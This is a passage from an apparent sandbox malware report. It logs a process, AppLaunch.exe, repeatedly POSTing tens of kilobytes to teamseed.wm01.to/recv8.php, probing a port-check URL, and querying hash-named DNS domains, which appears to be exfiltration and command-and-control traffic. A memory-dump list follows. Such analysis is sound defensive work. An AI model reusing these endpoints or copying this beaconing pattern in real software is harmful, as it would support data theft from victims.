                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:40 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 44
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 36001
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:40 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:42 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 44
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 36085
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:43 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:45 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 44
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 35337
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:45 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:47 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 44
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 36193
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:47 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:49 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:51 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 44
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 26845
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:52 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:54 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:56 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 44
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 27037
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:56 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:49:58 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:50:00 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 44
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 26893
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:50:01 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • POST
                          https://teamseed.wm01.to/recv8.php
                          AppLaunch.exe
                          Remote address:
                          45.153.186.90:443
                          Request
                          POST /recv8.php HTTP/1.1
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: WM Client
                          Host: teamseed.wm01.to
                          Content-Length: 203
                          Cache-Control: no-cache
                          Cookie: PHPSESSID=ecjl3tlqg6s6duvfrtqofab8f0
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx/1.14.0 (Ubuntu)
                          Date: Sun, 22 Aug 2021 12:50:03 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 1
                          Connection: keep-alive
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                        • 216.58.214.14:80
                          http://google.com/
                          http
                          ApowerREC.exe
                          337 B
                          481 B
                          6
                          4

                          HTTP Request

                          HEAD http://google.com/

                          HTTP Response

                          301
                        • 172.217.19.196:80
                          http://www.google.com/
                          http
                          ApowerREC.exe
                          295 B
                          727 B
                          5
                          3

                          HTTP Request

                          HEAD http://www.google.com/

                          HTTP Response

                          200
                        • 216.58.214.14:80
                          http://google.com/
                          http
                          chrome.exe
                          291 B
                          441 B
                          5
                          3

                          HTTP Request

                          HEAD http://google.com/

                          HTTP Response

                          301
                        • 172.217.19.196:80
                          http://www.google.com/
                          http
                          chrome.exe
                          295 B
                          727 B
                          5
                          3

                          HTTP Request

                          HEAD http://www.google.com/

                          HTTP Response

                          200
                        • 216.58.214.14:80
                          http://google.com/
                          http
                          chrome.exe
                          291 B
                          441 B
                          5
                          3

                          HTTP Request

                          HEAD http://google.com/

                          HTTP Response

                          301
                        • 172.217.19.196:80
                          http://www.google.com/
                          http
                          chrome.exe
                          295 B
                          727 B
                          5
                          3

                          HTTP Request

                          HEAD http://www.google.com/

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.2kB
                          3.0kB
                          11
                          8

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.4kB
                          671 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          895 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          37.3kB
                          1.1kB
                          34
                          17

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.2kB
                          671 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.2kB
                          671 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.2kB
                          671 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          671 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          715 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          37.5kB
                          1.1kB
                          34
                          17

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          715 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          38.5kB
                          1.1kB
                          34
                          17

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          715 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          38.7kB
                          831 B
                          35
                          10

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          715 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          38.2kB
                          991 B
                          34
                          14

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          671 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 2.56.214.65:80
                          http://2.56.214.65/check.php?port1=56007
                          http
                          AppLaunch.exe
                          334 B
                          360 B
                          6
                          5

                          HTTP Request

                          GET http://2.56.214.65/check.php?port1=56007

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          715 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          28.4kB
                          831 B
                          28
                          10

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          715 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          37.4kB
                          831 B
                          34
                          10

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 216.58.214.14:80
                          http://google.com/
                          http
                          chrome.exe
                          245 B
                          441 B
                          4
                          3

                          HTTP Request

                          HEAD http://google.com/

                          HTTP Response

                          301
                        • 172.217.19.196:80
                          http://www.google.com/
                          http
                          chrome.exe
                          295 B
                          727 B
                          5
                          3

                          HTTP Request

                          HEAD http://www.google.com/

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          715 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          38.2kB
                          991 B
                          35
                          14

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          715 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          38.3kB
                          1.1kB
                          35
                          17

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          715 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          37.5kB
                          1.2kB
                          34
                          18

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          715 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          38.3kB
                          951 B
                          34
                          13

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          671 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          715 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          28.7kB
                          991 B
                          28
                          14

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          671 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          715 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          28.9kB
                          711 B
                          28
                          7

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          671 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.3kB
                          715 B
                          9
                          6

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          28.7kB
                          1.2kB
                          26
                          19

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 45.153.186.90:443
                          https://teamseed.wm01.to/recv8.php
                          tls, http
                          AppLaunch.exe
                          1.2kB
                          631 B
                          7
                          5

                          HTTP Request

                          POST https://teamseed.wm01.to/recv8.php

                          HTTP Response

                          200
                        • 8.8.8.8:53
                          google.com
                          dns
                          chrome.exe
                          56 B
                          72 B
                          1
                          1

                          DNS Request

                          google.com

                          DNS Response

                          216.58.214.14

                        • 8.8.8.8:53
                          sdns.se
                          dns
                          AppLaunch.exe
                          53 B
                          69 B
                          1
                          1

                          DNS Request

                          sdns.se

                          DNS Response

                          185.243.215.214

                        • 8.8.8.8:53
                          ntp.se
                          dns
                          AppLaunch.exe
                          52 B
                          68 B
                          1
                          1

                          DNS Request

                          ntp.se

                          DNS Response

                          194.58.200.20

                        • 194.58.200.20:123
                          ntp.se
                          ntp
                          AppLaunch.exe
                          76 B
                          76 B
                          1
                          1
                        • 185.243.215.214:53
                          sdns.se
                          dns
                          AppLaunch.exe
                          405 B
                          5

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                        • 194.58.200.20:123
                          ntp.se
                          ntp
                          AppLaunch.exe
                          76 B
                          76 B
                          1
                          1
                        • 185.243.215.214:53
                          sdns.se
                          dns
                          AppLaunch.exe
                          405 B
                          5

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                        • 185.243.215.214:53
                          sdns.se
                          dns
                          AppLaunch.exe
                          405 B
                          5

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                        • 194.58.200.20:123
                          ntp.se
                          ntp
                          AppLaunch.exe
                          76 B
                          76 B
                          1
                          1
                        • 1.2.4.8:53
                          387d8b62b0aef501f4f4ebef23416753.se
                          dns
                          AppLaunch.exe
                          81 B
                          157 B
                          1
                          1

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                        • 1.2.4.8:53
                          387d8b62b0aef501f4f4ebef23416753.se
                          dns
                          AppLaunch.exe
                          81 B
                          157 B
                          1
                          1

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                        • 194.58.200.20:123
                          ntp.se
                          ntp
                          AppLaunch.exe
                          76 B
                          76 B
                          1
                          1
                        • 114.114.114.114:53
                          387d8b62b0aef501f4f4ebef23416753.se
                          dns
                          AppLaunch.exe
                          81 B
                          157 B
                          1
                          1

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                        • 114.114.114.114:53
                          387d8b62b0aef501f4f4ebef23416753.se
                          dns
                          AppLaunch.exe
                          81 B
                          157 B
                          1
                          1

                          DNS Request

                          387d8b62b0aef501f4f4ebef23416753.se

                        • 8.8.8.8:53
                          teamseed.wm01.to
                          dns
                          AppLaunch.exe
                          62 B
                          78 B
                          1
                          1

                          DNS Request

                          teamseed.wm01.to

                          DNS Response

                          45.153.186.90

                        MITRE ATT&CK Enterprise v6

                        Downloads

                        • memory/512-143-0x0000000002B30000-0x0000000002B31000-memory.dmp

                          Filesize

                          4KB

                        • memory/1504-155-0x0000000000400000-0x000000000041B000-memory.dmp

                          Filesize

                          108KB

                        • memory/1504-171-0x0000000000400000-0x000000000041B000-memory.dmp

                          Filesize

                          108KB

                        • memory/1968-117-0x0000000005200000-0x0000000005201000-memory.dmp

                          Filesize

                          4KB

                        • memory/1968-114-0x0000000000B10000-0x0000000000B11000-memory.dmp

                          Filesize

                          4KB

                        • memory/1968-116-0x0000000005700000-0x0000000005701000-memory.dmp

                          Filesize

                          4KB

                        • memory/1968-118-0x0000000005130000-0x0000000005131000-memory.dmp

                          Filesize

                          4KB

                        • memory/1968-119-0x00000000051E0000-0x00000000051E1000-memory.dmp

                          Filesize

                          4KB

                        • memory/2420-154-0x0000000007530000-0x0000000008530000-memory.dmp

                          Filesize

                          16.0MB

                        • memory/2420-149-0x0000000000400000-0x00000000005F7000-memory.dmp

                          Filesize

                          2.0MB

                        • memory/2420-145-0x0000000000400000-0x00000000005F7000-memory.dmp

                          Filesize

                          2.0MB

                        • memory/3264-133-0x0000000000A10000-0x0000000000A11000-memory.dmp

                          Filesize

                          4KB

                        • memory/3264-128-0x0000000000B50000-0x0000000000B51000-memory.dmp

                          Filesize

                          4KB

                        • memory/3884-177-0x0000000005740000-0x0000000005741000-memory.dmp

                          Filesize

                          4KB
